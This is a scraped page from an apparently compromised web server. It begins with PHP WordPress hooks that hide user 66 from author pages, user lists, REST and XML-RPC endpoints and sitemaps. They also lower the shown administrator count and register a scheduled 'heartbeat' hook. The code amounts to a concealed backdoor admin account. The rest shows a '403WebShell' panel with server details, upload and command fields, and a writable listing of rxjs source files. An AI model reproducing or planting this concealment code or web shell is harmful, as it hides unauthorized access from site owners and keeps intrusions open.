add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/jungly/node_modules/rxjs/src/internal/operators/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
February 05 2026 19:13:11
www-data / www-data
0755
audit.ts
4.144 KB
February 05 2026 19:13:10
www-data / www-data
0664
auditTime.ts
2.377 KB
February 05 2026 19:13:10
www-data / www-data
0664
buffer.ts
2.535 KB
February 05 2026 19:13:10
www-data / www-data
0664
bufferCount.ts
4.463 KB
February 05 2026 19:13:10
www-data / www-data
0664
bufferTime.ts
8.515 KB
February 05 2026 19:13:10
www-data / www-data
0664
bufferToggle.ts
5.601 KB
February 05 2026 19:13:10
www-data / www-data
0664
bufferWhen.ts
3.891 KB
February 05 2026 19:13:10
www-data / www-data
0664
catchError.ts
4.723 KB
February 05 2026 19:13:10
www-data / www-data
0664
combineAll.ts
2.441 KB
February 05 2026 19:13:10
www-data / www-data
0664
combineLatest.ts
4.323 KB
February 05 2026 19:13:10
www-data / www-data
0664
concat.ts
2.182 KB
February 05 2026 19:13:10
www-data / www-data
0664
concatAll.ts
2.259 KB
February 05 2026 19:13:10
www-data / www-data
0664
concatMap.ts
3.403 KB
February 05 2026 19:13:10
www-data / www-data
0664
concatMapTo.ts
3.048 KB
February 05 2026 19:13:10
www-data / www-data
0664
count.ts
3.783 KB
February 05 2026 19:13:10
www-data / www-data
0664
debounce.ts
4.878 KB
February 05 2026 19:13:10
www-data / www-data
0664
debounceTime.ts
4.544 KB
February 05 2026 19:13:10
www-data / www-data
0664
defaultIfEmpty.ts
2.69 KB
February 05 2026 19:13:10
www-data / www-data
0664
delay.ts
5.093 KB
February 05 2026 19:13:10
www-data / www-data
0664
delayWhen.ts
7.695 KB
February 05 2026 19:13:10
www-data / www-data
0664
dematerialize.ts
2.582 KB
February 05 2026 19:13:10
www-data / www-data
0664
distinct.ts
4.216 KB
February 05 2026 19:13:10
www-data / www-data
0664
distinctUntilChanged.ts
3.756 KB
February 05 2026 19:13:10
www-data / www-data
0664
distinctUntilKeyChanged.ts
2.787 KB
February 05 2026 19:13:10
www-data / www-data
0664
elementAt.ts
2.558 KB
February 05 2026 19:13:10
www-data / www-data
0664
endWith.ts
4.064 KB
February 05 2026 19:13:10
www-data / www-data
0664
every.ts
2.535 KB
February 05 2026 19:13:11
www-data / www-data
0664
exhaust.ts
3.196 KB
February 05 2026 19:13:11
www-data / www-data
0664
exhaustMap.ts
5.637 KB
February 05 2026 19:13:11
www-data / www-data
0664
expand.ts
6.184 KB
February 05 2026 19:13:11
www-data / www-data
0664
filter.ts
3.693 KB
February 05 2026 19:13:11
www-data / www-data
0664
finalize.ts
1.301 KB
February 05 2026 19:13:11
www-data / www-data
0664
find.ts
3.813 KB
February 05 2026 19:13:11
www-data / www-data
0664
findIndex.ts
1.861 KB
February 05 2026 19:13:11
www-data / www-data
0664
first.ts
3.355 KB
February 05 2026 19:13:11
www-data / www-data
0664
groupBy.ts
9.953 KB
February 05 2026 19:13:11
www-data / www-data
0664
ignoreElements.ts
1.488 KB
February 05 2026 19:13:11
www-data / www-data
0664
index.ts
4.017 KB
February 05 2026 19:13:11
www-data / www-data
0664
isEmpty.ts
2.673 KB
February 05 2026 19:13:11
www-data / www-data
0664
last.ts
2.355 KB
February 05 2026 19:13:11
www-data / www-data
0664
map.ts
3.038 KB
February 05 2026 19:13:11
www-data / www-data
0664
mapTo.ts
1.903 KB
February 05 2026 19:13:11
www-data / www-data
0664
materialize.ts
3.255 KB
February 05 2026 19:13:11
www-data / www-data
0664
max.ts
1.539 KB
February 05 2026 19:13:11
www-data / www-data
0664
merge.ts
3.591 KB
February 05 2026 19:13:11
www-data / www-data
0664
mergeAll.ts
2.43 KB
February 05 2026 19:13:11
www-data / www-data
0664
mergeMap.ts
6.278 KB
February 05 2026 19:13:11
www-data / www-data
0664
mergeMapTo.ts
2.563 KB
February 05 2026 19:13:11
www-data / www-data
0664
mergeScan.ts
4.654 KB
February 05 2026 19:13:11
www-data / www-data
0664
min.ts
1.54 KB
February 05 2026 19:13:11
www-data / www-data
0664
multicast.ts
3.462 KB
February 05 2026 19:13:11
www-data / www-data
0664
observeOn.ts
5.174 KB
February 05 2026 19:13:11
www-data / www-data
0664
onErrorResumeNext.ts
8.181 KB
February 05 2026 19:13:11
www-data / www-data
0664
pairwise.ts
2.426 KB
February 05 2026 19:13:11
www-data / www-data
0664
partition.ts
2.682 KB
February 05 2026 19:13:11
www-data / www-data
0664
pluck.ts
3.068 KB
February 05 2026 19:13:11
www-data / www-data
0664
publish.ts
2.512 KB
February 05 2026 19:13:11
www-data / www-data
0664
publishBehavior.ts
0.575 KB
February 05 2026 19:13:11
www-data / www-data
0664
publishLast.ts
2.063 KB
February 05 2026 19:13:11
www-data / www-data
0664
publishReplay.ts
1.468 KB
February 05 2026 19:13:11
www-data / www-data
0664
race.ts
1.854 KB
February 05 2026 19:13:11
www-data / www-data
0664
reduce.ts
3.712 KB
February 05 2026 19:13:11
www-data / www-data
0664
refCount.ts
5.005 KB
February 05 2026 19:13:11
www-data / www-data
0664
repeat.ts
3.034 KB
February 05 2026 19:13:11
www-data / www-data
0664
repeatWhen.ts
4.152 KB
February 05 2026 19:13:11
www-data / www-data
0664
retry.ts
2.741 KB
February 05 2026 19:13:11
www-data / www-data
0664
retryWhen.ts
3.446 KB
February 05 2026 19:13:11
www-data / www-data
0664
sample.ts
2.781 KB
February 05 2026 19:13:11
www-data / www-data
0664
sampleTime.ts
3.176 KB
February 05 2026 19:13:11
www-data / www-data
0664
scan.ts
4.131 KB
February 05 2026 19:13:11
www-data / www-data
0664
sequenceEqual.ts
5.16 KB
February 05 2026 19:13:11
www-data / www-data
0664
share.ts
1.016 KB
February 05 2026 19:13:11
www-data / www-data
0664
shareReplay.ts
4.614 KB
February 05 2026 19:13:11
www-data / www-data
0664
single.ts
3.795 KB
February 05 2026 19:13:11
www-data / www-data
0664
skip.ts
1.273 KB
February 05 2026 19:13:11
www-data / www-data
0664
skipLast.ts
2.814 KB
February 05 2026 19:13:11
www-data / www-data
0664
skipUntil.ts
3.811 KB
February 05 2026 19:13:11
www-data / www-data
0664
skipWhile.ts
1.945 KB
February 05 2026 19:13:11
www-data / www-data
0664
startWith.ts
4.354 KB
February 05 2026 19:13:11
www-data / www-data
0664
subscribeOn.ts
2.557 KB
February 05 2026 19:13:11
www-data / www-data
0664
switchAll.ts
1.993 KB
February 05 2026 19:13:11
www-data / www-data
0664
switchMap.ts
6.035 KB
February 05 2026 19:13:11
www-data / www-data
0664
switchMapTo.ts
2.557 KB
February 05 2026 19:13:11
www-data / www-data
0664
take.ts
2.743 KB
February 05 2026 19:13:11
www-data / www-data
0664
takeLast.ts
3.441 KB
February 05 2026 19:13:11
www-data / www-data
0664
takeUntil.ts
2.794 KB
February 05 2026 19:13:11
www-data / www-data
0664
takeWhile.ts
3.874 KB
February 05 2026 19:13:11
www-data / www-data
0664
tap.ts
5.329 KB
February 05 2026 19:13:11
www-data / www-data
0664
throttle.ts
4.83 KB
February 05 2026 19:13:11
www-data / www-data
0664
throttleTime.ts
5.829 KB
February 05 2026 19:13:11
www-data / www-data
0664
throwIfEmpty.ts
2.191 KB
February 05 2026 19:13:11
www-data / www-data
0664
timeInterval.ts
2.492 KB
February 05 2026 19:13:11
www-data / www-data
0664
timeout.ts
4.074 KB
February 05 2026 19:13:11
www-data / www-data
0664
timeoutWith.ts
6.134 KB
February 05 2026 19:13:11
www-data / www-data
0664
timestamp.ts
1.669 KB
February 05 2026 19:13:11
www-data / www-data
0664
toArray.ts
1.122 KB
February 05 2026 19:13:11
www-data / www-data
0664
window.ts
3.717 KB
February 05 2026 19:13:11
www-data / www-data
0664
windowCount.ts
4.823 KB
February 05 2026 19:13:11
www-data / www-data
0664
windowTime.ts
9.903 KB
February 05 2026 19:13:11
www-data / www-data
0664
windowToggle.ts
6.196 KB
February 05 2026 19:13:11
www-data / www-data
0664
windowWhen.ts
4.572 KB
February 05 2026 19:13:11
www-data / www-data
0664
withLatestFrom.ts
7.718 KB
February 05 2026 19:13:11
www-data / www-data
0664
zip.ts
3.346 KB
February 05 2026 19:13:11
www-data / www-data
0664
zipAll.ts
0.638 KB
February 05 2026 19:13:11
www-data / www-data
0664

Youez - 2016 - github.com/yon3zu
LinuXploit